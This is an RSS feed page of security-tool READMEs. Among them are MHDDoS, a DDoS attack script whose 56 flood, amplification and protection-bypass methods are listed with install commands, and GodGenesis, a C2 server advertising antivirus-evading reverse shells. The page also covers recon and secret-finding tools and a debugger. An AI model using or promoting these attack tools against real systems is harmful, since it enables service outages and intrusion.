FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

MHDDoS - DDoS Attack Script With 56 Methods



Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods 

Please Don't Attack websites without the owners consent.




Features And Methods

  • Layer7
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (9) GET | GET Flood
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (10) POST | POST Flood
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (11) OVH | Bypass OVH
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (12) RHEX | Random HEX
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (13) STOMP | Bypass chk_captcha
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (14) STRESS | Send HTTP Packet With High Byte
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (15) DYN | A New Method With Random SubDomain
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (16) DOWNLOADER | A New Method of Reading data slowly
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (17) SLOW | Slowloris Old Method of DDoS
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (18) HEAD | https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/HEAD
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (19) NULL | Null UserAgent and ...
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (20) COOKIE | Random Cookie PHP 'if (isset($_COOKIE))'
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (21) PPS | Only 'GET / HTTP/1.1\r\n\r\n'
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (22) EVEN | GET Method with more header
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (23) GSB | Google Project Shield Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (24) DGB | DDoS Guard Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (25) AVB | Arvan Cloud Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (26) BOT | Like Google bot
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (27) APACHE | Apache Expliot
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (28) XMLRPC | WP XMLRPC expliot (add /xmlrpc.php)
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (29) CFB | CloudFlare Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (30) CFBUAM | CloudFlare Under Attack Mode Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (31) BYPASS | Bypass Normal AntiDDoS
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (32) BOMB | Bypass with codesenberg/bombardier
    • KILLER | run many threads to kill a target
    • TOR | Bypass onion website
  • Layer4:
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (33) TCP | TCP Flood Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (34) UDP | UDP Flood Bypass
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (35) SYN | SYN Flood
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (36) CPS | Open and close connections with proxy
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (37) ICMP | Icmp echo request flood (Layer3)
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (38) CONNECTION | Open connection alive with proxy
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (39) VSE | Send Valve Source Engine Protocol
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (40) TS3 | Send Teamspeak 3 Status Ping Protocol
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (41) FIVEM | Send Fivem Status Pi ng Protocol
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (42) MEM | Memcached Amplification
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (43) NTP | NTP Amplification
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (44) MCBOT | Minecraft Bot Attack
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (45) MINECRAFT | Minecraft Status Ping Protocol
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (46) MCPE | Minecraft PE Status Ping Protocol
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (47) DNS | DNS Amplification
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (48) CHAR | Chargen Amplification
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (49) CLDAP | Cldap Amplification
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (50) ARD | Apple Remote Desktop Amplification
    • Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods (51) RDP | Remote Desktop Protocol Amplification
  • ⚙️ Tools - Run With python3 start.py tools
    • CFIP | Find Real IP Address Of Websites Powered By Cloudflare
    • DNS | Show DNS Records Of Sites
    • TSSRV | TeamSpeak SRV Resolver
    • PING | PING Servers
    • CHECK | Check If Websites Status
    • DSTAT | That Shows Bytes Received, bytes Sent and their amount
  • Other
    • STOP | STOP All Attacks
    • TOOLS | Console Tools
    • HELP | Show Usage Script

If u Like the project Leave a star on the repository!

Downloads

You can download it from GitHub Releases

Getting Started

Requirements


Videos

Tutorial


Documentation

You can read it from GitHub Wiki

Clone and Install Script

git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt

One-Line Installing on Fresh VPS

apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt

Donation Links:



PartyLoud - A Simple Tool To Generate Fake Web Browsing And Mitigate Tracking


PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.


  • Simple. 3 files only, no installation required, just clone this repo an you're ready to go.
  • Powerful. Thread-based navigation.
  • Stealthy. Optimized to emulate user navigation.
  • Portable. You can use this script on every unix-based OS.

This project was inspired by noisy.py


How It Works

  1. URLs and keywords are loaded (either from partyloud.conf and badwords or from user-defined files)
  2. If proxy flag has been used, proxy config will be tested
  3. For each URL in ULR-list a thread is started, each thread as an user agent associated
  4. Each thread will start by sending an HTTP request to the given URL
  5. The response if filtered using the keywords in order to prevent 404s and malformed URLs
  6. A new URL is choosen from the list generated after filering
  7. Current thread sleeps for a random time
  8. Actions from 4 to 7 are repeated using the new URL until user send kill signal (CTRL-C or enter key)

Features

  • Configurable urls list and blocklist
  • Random DNS Mode : each request is done on a different DNS Server
  • Multi-threaded request engine (# of thread are equal to # of urls in partyloud.conf)
  • Error recovery mechanism to protect Engines from failures
  • Spoofed User Agent prevent from fingerprinting (each engine has a different user agent)
  • Dynamic UI

Setup

Clone the repository:

git clone https://github.com/realtho/PartyLoud.git

Navigate to the directory and make the script executable:

cd PartyLoud
chmod +x partyloud.sh

Run 'partyloud':

./partyloud.sh

Usage

Usage: ./partyloud.sh [options...]

-d --dns <file> DNS Servers are sourced from specified FILE,
each request will use a different DNS Server
in the list
!!WARNING THIS FEATURE IS EXPERIMENTAL!!
!!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list <file> read URL list from specified FILE
-b --blocklist <file> read blocklist from specified FILE
-p --http-proxy <http://ip:port> set a HTTP proxy
-s --https-proxy <https://ip:port> set a HTTPS proxy
-n --no-wait disable wait between one request and an other
-h --help dispaly this help
To stop the script press either enter or CRTL-C

 
File Specifications

In current release there is no input-validation on files.
If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub

Intro

If you don’t have special needs , default config files are just fine to get you started.

Default files are located in:

Please note that file name and extension are not important, just content of files matter

badwords - Keywords-based blocklist

badwords is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file:

DO ✅ DONT
Use only ASCII chars Define one-site-only rules
Try to keep the rules as general as possible Define case-sensitive rules
Prefer relative path Place more than one rule per line

partyloud.conf - ULR List

partyloud.conf is a ULR List used as starting point for fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside suggesting you not to use google, youtube and social networks related links, I've really no hints for you.

Note #1 - To work properly the URLs must be well-formed
Note #2 - Even if the file contains 1000 lines only 10 are used (first 10, working on randomness)
Note #3 - Only one URL per line is allowed

DNSList - DNS List

DNSList is a List of DNS used as argument for random DNS feature. Random DNS is not enable by default, so the “default file” is really just a guide line and a test used while developing the function to se if everything was working as expected.
The only suggestion here is to add as much address as possible to increase randomness.

Note #1 - Only one address per line is allowed

PenguinTrace - Tool To Show How Code Runs At The Hardware Level


penguinTrace is intended to help build an understanding of how programs run at the hardware level. It provides a way to see what instructions compile to, and then step through those instructions and see how they affect machine state as well as how this maps back to variables in the original program. A bit more background is available on the website.

penguinTrace starts a web-server which provides a web interface to edit and run code. Code can be developed in C, C++ or Assembly. The resulting assembly is then displayed and can then be stepped through, with the values of hardware registers and variables in the current scope shown.

penguinTrace runs on Linux and supports the AMD64/X86-64 and AArch64 architectures. penguinTrace can run on other operating systems using Docker, a virtual machine or through the Windows Subsystem for Linux (WSL).


The primary goal of penguinTrace is to allow exploring how programs execute on a processor, however the development provided an opportunity to explore how debuggers work and some lower-level details of interaction with the kernel.

Note: penguinTrace allows running arbitrary code as part of its design. By default it will only listen for connections from the local machine. It should only be configured to listen for remote connections on a trusted network and not exposed to the interface. This can be mitigated by running penguinTrace in a container, and a limited degree of isolation of stepped code can be provided when libcap is available.

Getting Started

Prerequisites

penguinTrace requires 64-bit Linux running on a X86-64 or AArch64 processor. It can also run on a Raspberry Pi running a 64-bit (AArch64) Linux distribution. For other operating systems, it can be run on Windows 10 using the Windows Subsystem for Linux (WSL) or in a Docker container. WSL does not support tracee process isolation.

python
clang
llvm
llvm-dev
libclang-dev
libcap-dev # For containment

Building

To build penguinTrace outside of a container, clone the repository and run make. The binaries will be placed in build/bin by default.

To build penguinTrace in Docker, run docker build -t penguintrace github.com/penguintrace/penguintrace.

Running

Once penguinTrace is built, running the penguintrace binary will start the server.

If built in a container it can then be run with docker run -it -p 127.0.0.1:8080:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace. See Containers for details on better isolating the container.

Then navigate to 127.0.0.1:8080 or localhost:8080 to access the web interface.

Note: In order to run on port 80, you can modify the docker run command to map from port 8080 to port 80, e.g. -p 127.0.0.1:80:8080.

If built locally, you can modify the binary to allow it to bind to port 80 with sudo setcap CAP_NET_BIND_SERVICE=+ep penguintrace. It can then be run with penguintrace -c SERVER_PORT 80

penguinTrace defaults to port 8080 as it is intended to be run as an unprivileged user.

Temporary Files

The penguinTrace server uses the system temporary directory as a location for compiled binaries and environments for running traced processes. If the PENGUINTRACE_TMPDIR environment variable is defined, this directory will be used. It will fall back to the TMPDIR environment variable and finally the directories specified in the C library.

This must correspond to a directory without noexec set, if running in a container it is likely the filesystem will have this set by default.

Networking

By default penguinTrace only listens on the loopback device and IPv4. If the server is configured to listen on all addresses, then also setting the server to IPv6 will allow connections on both IPv4 and IPv6, this is the default mode when running in a Docker container.

This is because penguinTrace only creates a single thread to listen to connections and so can currently only bind to a single address or all addresses.

Session Handling

By default penguinTrace runs in multiple session mode, each time code is compiled a new session is created. The URL fragment (after the '#') of the UI is updated with the session id, and this URL can be used to reconnect to the same session.

If running in single session mode each penguinTrace instance only supports a single debugging instance. The web UI will automatically reconnect to a previous session. To support multiple sessions, multiple instances should be launched which are listening on different ports.

Containers

The docker_build.sh and docker_run.sh scripts provide an example of how to run penguinTrace in a Docker container. Dockerfile_noisolate provides an alterative way of running that does not require the SYS_ADMIN capability but provides less isolation between the server and the traced processes. The SYS_PTRACE capability is always required for the server to trace processes. misc/apparmor-profile provides an example AppArmor profile that is suitable for running penguinTrace but may need some customisation for the location of temporary directories and compilers.

AArch64 / Raspberry Pi

penguinTrace will only run under a 64-bit operating system. The official operating systems provided for the Raspberry Pi are all 32-bit, to run penguinTrace something such as pi64 or Arch Linux Arm is required.

Full instructions for setting up a 64-bit OS on Raspberry Pi TBD.

Authors

penguinTrace is developed by Alex Beharrell.

License

This project is licensed under the GNU AGPL. A non-permissive open source license is chosen as the intention of this project is educational, and so any derivative works should have the source available so that people can learn from it.

The bundling of the source code relies on the structure of the repository. Derivative works that are not forked from a penguinTrace repository will need to modify the Makefile rules for static/source.tar.gz to ensure the modified source is correctly distributed.

Acknowledgements

penguinTrace makes use of jQuery and CodeMirror for some aspects of the web interface. Both are licensed under the MIT License. It also uses the Major Mono font which is licensed under the Open Font License.



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • get them from a Burp project (pass location of a Burp XML file)
  • get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies † Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers † Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth † The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes † Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout † How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent † What User Agents to get links for, e.g. -u desktop mobile
-insecure Whether TLS certificate checks should be disabled when making requests (delfault: false)
-s429 Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO Stop when > 95 percent of requests time out (default: false)
-sCE Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size † The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size..
-replay-proxy For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses Content-Type headers are checked against. Any responses with the these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound † - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords † - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON † - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars † - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML † - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField † - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName † - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending request to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from a files in a directory - Basic

If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items. Ensure that the option base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report and selecting Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3

NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i.

Recommendations and Notes

  • Always use the Scope Prefix argument -sp. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http):
    http://www.target.com
    https://target-payments.com
    https://static.target-cdn.com
    If a link is found that has no domain, e.g. /path/to/example.js then giving passing -sp http://www.target.com will result in teh output http://www.target.com/path/to/example.js and if Depth (-d) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp then the output will include each domain followed by /path/to/example.js and increase the chance of finding more links.
  • If you use -sp but still want the original link of /path/to/example.js (without a domain) additionally returned in the output, the pass the argument -spo.
  • Always use the Scope Filter argument -sf. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included):
    target.*
    target-payments.com
    static.target-cdn.com
    THIS IS FOR FILTERING THE LINKS DOMAIN ONLY.
  • If you want to filter the final output in any way, use -ra. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.
  • Use the -v option to have a better idea of what the tool is doing.
  • If you have problems, use the -vv option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.
  • Pass cookies (-c), headers (-H) and regex (-ra) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
  • Set the -o option to give a specific output file name for Links, rather than the default of output.txt. If you plan on running a large depth of searches, start with 2 with option -v to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow.
  • Set the -op option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt. Any output will be appended to the existing file, unless you pass -ow.
  • If using a high Depth (-d) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429, s403, sTO, sCE) should also be considered.
  • If you are finding a large number of links (especially if the Depth (-d value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m) value and end gracefully with data intact before getting killed.
  • If you decide to cancel xnLinkFinder (using Ctrl-C) in the middle of running, be patient and any gathered data will be saved before ending gracefully.
  • Using the -orig option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.
  • When making requests, xnLinkFinder will use a random User-Agent from the current group, which defaults to desktop. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile for example (separate with a space). The mobile user agent option is an combination of mobile-apple, mobile-android and mobile-windows.
  • When -i has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs (default: 500 MB) will be skipped.
  • When using the -replay-proxy option, sometimes requests can take longer. If you start seeing more Request Timeout errors (you'll see errors if you use -v or -vv options) then consider using -t to raise the timeout limit.
  • If you know a target will only have ASCII characters in links and parameters then consider passing -ascii-only. This can eliminate a number of false positives that can sometimes get returned from binary data.

Issues

If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv to reproduce the problem and let me know about any error messages that are given.

TODO

  • I seem to have completed all the TODO's I originally had! If you think of any that need adding, let me know

Example output

Active link finding for a domain:

...

Piped input and output:

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

/XNL-h4ck3r


JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets


JSubFinder is a tool writtin in golang to search webpages & javascript for hidden subdomains and secrets in the given URL. Developed with BugBounty hunters in mind JSubFinder takes advantage of Go's amazing performance allowing it to utilize large data sets & be easily chained with other tools.


Install

Install the application and download the signatures needed to find secrets

Using GO:

go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml

or

Downloads Page

Basic Usage

Search

Search the given url's for subdomains and secrets

$ jsubfinder search -h

Execute the command specified

Usage:
JSubFinder search [flags]

Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Ammount of threads to be used (default 5)
-u, --url strings Url to check

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console

Examples (results are the same in this case):

$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search$

apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com

With Secrets Enabled

note --secrets="" will save the secret results in a secrets.txt file

$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com

Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com

Advanced examples

$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
  • -crawl use the default crawler to crawl pages for other URL's to analyze
  • -s enables JSubFinder to search for secrets
  • -S Silence output to console
  • -o <file> save output to specified file
  • -t 10 use 10 threads
  • -g search every URL for JS, even ones we don't think have any

Proxy

Enables the upstream HTTP proxy with TLS MITM sypport. This allows you to:

  1. Browse sites in realtime and have JSubFinder search for subdomains and secrets real time.
  2. If needed run jsubfinder on another server to offload the workload
$ JSubFinder proxy -h

Execute the command specified

Usage:
JSubFinder proxy [flags]

Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com
-u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com

With Burp Suite

  1. Configure Burp Suite to forward traffic to an upstream proxy/ (User Options > Connections > Upsteam Proxy Servers > Add)
  2. Run JSubFinder in proxy mode

Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to burp and in another thread search for subdomains and secrets.

With Proxify

  1. Launch Proxify & dump traffic to a folder proxify -output logs
  2. Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their github page)
  3. Launch JSubFinder in proxy mode & set the upstream proxy as Proxify jsubfinder proxy -u http://127.0.0.1:8443
  4. Use Proxify's replay utility to replay the dumped traffic to jsubfinder replay -output logs -burp-addr http://127.0.0.1:8444

Run on another server

Simple, run JSubFinder in proxy mode on another server e.g 192.168.1.2. Follow the proxy steps above but set your applications upstream proxy as 192.168.1.2:8443

Advanced Examples

$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
  • --scope limits JSubFinder to only analyze responses from www.reddit.com
  • -p port JSubFinders proxy server is running on
  • -S silence output to the console/stdout
  • -o <file> output examples to this file


GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints

God Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait a min, its a FUD and can give u admin shell from any targeted WINDOWS Machine.


The List Of Commands It Supports :-

                ===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs

===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --& gt; Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directoty Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name

===================================================================================================
INFORMATION GATHERING COMMANDS:
